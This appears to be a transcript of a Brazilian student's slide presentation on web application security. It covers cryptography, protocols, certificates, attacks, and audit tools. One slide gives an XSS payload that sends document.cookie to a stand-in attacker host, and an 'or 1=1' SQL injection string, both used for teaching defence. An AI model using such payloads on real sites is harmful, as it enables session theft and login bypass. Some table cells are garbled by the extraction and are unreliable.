A apresentação está carregando. Por favor, espere

A apresentação está carregando. Por favor, espere

SEGURANÇA DE APLICAÇÕES NA WEB Aluno: Thiago Augusto Lopes Genez Orientador: Mario Lemes Proença Jr.

Apresentações semelhantes


Apresentação em tema: "SEGURANÇA DE APLICAÇÕES NA WEB Aluno: Thiago Augusto Lopes Genez Orientador: Mario Lemes Proença Jr."— Transcrição da apresentação:

1 SEGURANÇA DE APLICAÇÕES NA WEB Aluno: Thiago Augusto Lopes Genez Orientador: Mario Lemes Proença Jr.

2 S UMÁRIO Introdução Conceitos Básicos de Segurança Algoritmos Criptográficos Protocolos de Segurança Identificação Digital Os Ataques Ferramentas de Auditoria de Segurança

3 I NTRODUÇÃO Aplicação WEB: Acessada por um navegador WEB Meio de comunicação O canal é inseguro  Internet Exemplos: E-commerce, Banking on-line Necessidade da Segurança Ausência da segurança Falta de manutenção e/ou configuração específica da segurança Falta de atualizações diárias Cada dia novos ataques são descobertos A camada da aplicação possui falhas de segurança

4 I NTRODUÇÃO Problema da insegurança nas aplicações WEB: Divulgação dos dados confidenciais “Quebra” do sigilo  Perda da confiabilidade pelo usuário. Informações caírem em “mãos erradas” Solução: Criptografia, protocolos criptográficos, identificação digital e ferramentas de auditoria. Objetivo Garantir que as informações mantenham-se intactas e protegidas durante a sua transmissão na Internet. Garantir um ambiente WEB seguro.

5 C ONCEITOS B ÁSICOS DE S EGURANÇA Serviços disponibilizados pela segurança: Autenticação Confidencialidade Integridade Não-repúdio Controle de Acesso Disponibilidade Tipos de ataques contra a Segurança Objetivo dos ataques: minimizar os serviços de segurança

6 C ONCEITOS B ÁSICOS DE S EGURANÇA

7 Classificação dos ataques Ataques passivos: sem modificação do conteúdo “Libertação” do conteúdo da mensagem Análise de tráfego Ataques Ativos: com modificação do conteúdo Disfarçado Mensagens repetitivas Modificação de Mensagens Negação de Serviço (DoS)

8 C ONCEITOS B ÁSICOS DE S EGURANÇA O Problema da Segurança no Ambiente WEB Ocorrem nos Browsers: Cookies, Applets, ActiveX, AJAX Entrada de dados não validado nas aplicações WEB Solucionando o problema de segurança na WEB: Proteger : O servidor WEB e os respectivos dados internos As informações que trafegam entre o servidor e o usuário Planejar uma arquitetura de segurança para as aplicações no seu ciclo de vida Os usuário finais devem navegar em uma plataforma segura.

9 C ONCEITOS B ÁSICOS DE S EGURANÇA

10 A LGORITMOS C RIPTOGRÁFICOS Origem etimológica grega: Ckryptós  “escondido” Gráphein  “escrever”. Objetivo: Texto legível  Cifra  texto ilegível Divididos em: Simétrico Codificação em Blocos Codificação em Fluxo Assimétrico Criptogrifia, Assinatura Digital e Troca de Chaves Funções Hash

11 A LGORITMOS C RIPTOGRÁFICOS S IMÉTRICOS AlgoritmoBlocoChaveInformações RC4Fluxo bits Internet Banking Caixa Econômica Federal, Banco do Brasil, Itaú RC bits bits Chave 64 quebrada, chave 72 bits segura RC6128 bits bits Ficou no 4° colocado do AES DES64 bits Defasado, 1998 quebrado por hardware TDES64 bits168 bits Comércio eletrônico PayPal AES bits 1997-Rijndael, pagseguro (UOL) Blowfish64 ou 128 bits128 bits Plataforma OpenBSD Twofish bits256 bits Ficou no 3° colocado do AES Serpent bits Ficou no 2° colocado do AES

12 A LGORITMOS C RIPTOGRÁFICOS A SSIMÉTRICOS AlgoritmoForneceChaveInformações RSA Criptografia Assinatura digital Troca de Chaves bits Utilizado na maioria dos certificados digitais Diffie- Hellman Troca de chaves bits Necessita de mecanismo extra para garantir autenticidade DSAAssinatura Digital1024 bits Proposto em 1991 para ser o padrão para assinaturas digitais ECC Criptografia Assinatura digital Troca de Chaves bits Desafiar e concorrer o RSA. Usado no DNSCurve ECDSAAssinatura Digital160 bitsConcorrente ao DSA

13 A LGORITMOS C RIPTOGRÁFICOS F UNÇÕES H ASH AlgoritmoTamanho HashInformações MD5128 bitsNão é resistente a colisão (2008) MD6512 bits Não avançou para a segunda fase do concurso SHA-3 em julho 2009 SHA-1160 bitsNão é resistente a colisão SHA-2 224, 256, 384, 512 bits Nenhum tipo de ataque foi relatado e a partir de 2010 todas agencias federais USA tem que substituir o SHA-1 para SHA-2 SHA-3 224, 256, 384, 512 bits Concurso proposto pela NIST. (andamento na 2° fase, resultado sairá em 2012)

14 P ROTOCOLOS DE S EGURANÇA ProtocolosAçãoForneceInformações SSL/TLS Entre as camadas de Transporte e a camada de aplicação Criptografia (três tipos), Certificados Digitais Podem acoplar protocolos de alto nível: Ex, HTTPS Ponto a Ponto IPsec Na camada de Rede (pacote IP criptografado) Autenticação, Criptografia e Gerenciamento de chaves Integrado no IPv6 Proteção nativa para todos os protocolos acima da camada de rede WS-Security Camada de aplicaçãoCriptografia XML Assinatura XML Web Services SOAP Fim a Fim DNSSec Serviço DNSAutenticação Protege ataques DNS Spoofing (Falso DNS) DNSCurve Serviço DNSAutenticação Criptografia Protege ataques DoS

15 P ROTOCOLOS DE S EGURANÇA SSL/TLS X WS-S ECURITY Informação está segura no canal Protege toda a mensagem Comunicação ponto a ponto Garante a segurança em todos os estágio da comunicação Protege somente as porções da mensagem que precisa de segurança Comunicação fim a fim

16 I DENTIFICAÇÃO D IGITAL Transações eletrônicas: Integridade, autenticidade e confidencialidade Assinatura Digital Bloco de dados criptografado anexado a mensagem Fornece: Autenticação, Integridade e Não repúdio Não garante a confidencialidade

17 I DENTIFICAÇÃO D IGITAL C ERTIFICADO D IGITAL Distribuir as chaves públicas de pessoas físicas e/ou jurídicas de forma segura. Autoridade Certificadora (AC) Terceiro Confiável

18 A TAQUES Para proteger dos ataques é necessário conhecê-los “Passos”: Reconhecimento do Alvo (DNS) Verificar a segurança da Rede O Ataque “Lá Dentro” Ataque de força bruta Ataque do Homem do Meio (Man-in-the-middle) Ataque contra as aplicações WEB Páginas dinâmicas Código executados no cliente (script client-side) Aplicação WEB + Servidor WEB +Banco de Dados Problema: Entrada dos dados não são tratados Dados armazenados em Cookies

19 A TAQUES XSS (Cross Site Scripting) document.location= servidor.invasor.com/roubarCookie.php?’+document.cookie document.location= servidor.invasor.com/roubarCookie.php?’+document.cookie Injeção SQL SELECT * FROM users WHERE username = ’" + username + "’ AND password = ’" + password + "’"; SELECT * FROM users WHERE username = ’" + username + "’ AND password = ’" + password + "’"; SELECT * FROM users WHERE username = ’ ’ or 1=1;-- ’ AND password = ’’; SELECT * FROM users WHERE username = ’ ’ or 1=1;-- ’ AND password = ’’; CSRF (Cross-site reference forgery) Manipula a sessão ativa da vítima (Cookie roubado) Altera os valores: nova_senha= &confirma_nova_senha= Phishing google.com  googIe.com DNS Spoofing Clickjacking

20 F ERRAMENTAS DE A UDITORIA DE S EGURANÇA Não é trivial encontrar vulnerabilidades das aplicações. Maioria das soluções propostas Não garante a proteção na lógica da aplicação Aplicações desenvolvidas sem uma segurança na camada da aplicação A segurança não incluída no ciclo de vida do software Entrada dados não validados  deixa a aplicação instável Ferramentas de auditoria Minimiza as vulnerabilidades Objetivo de testar a segurança na camada de aplicação Funcionam como um proxy Manipulações dos pedidos e respostas HTTP/HTTPS Age como: “Homem do meio”

21 F ERRAMENTAS DE A UDITORIA DE S EGURANÇA Funções\Ferramenta RatProxy Web Scarab Paros Burp Proxy w3af IBM AppScan Licença Livre Sim NãoSimNão Multiplataforma Sim Não Manipula pedidos/resposta HTTP(S) NãoSim Relatório detalhado SimNãoSim Sugestão para Correção Não Sim Suporte SSL/TLS Sim XSS, Injeção SQL, CSR Sim Análise de Cookies Sim Análise de dados ocultos Não SimNão Sim Análise RESTful NãoSim NãoSimNão Ambiente Desenvolvimento Não Sim

22 C ONCLUSÃO Base da segurança: Criptografia Comunicação entre usuário final e a aplicação WEB: Navegador WEB (browser) Canal é inseguro  Internet Solução: Protocolos Criptográficos Outra solução: identificação digital Transações eletrônicas: Integridade, Autenticidade e Confidencialidade Não garante a proteção na lógica da aplicação Linguagens WEB dinâmicas Entrada de dados não validados Deixa a aplicação WEB instável  facilita os ataques Ferramentas de auditoria  procura as vulnerabilidades Computação na nuvem ( cloud computing )

23 O BRIGADO


Carregar ppt "SEGURANÇA DE APLICAÇÕES NA WEB Aluno: Thiago Augusto Lopes Genez Orientador: Mario Lemes Proença Jr."

Apresentações semelhantes


Anúncios Google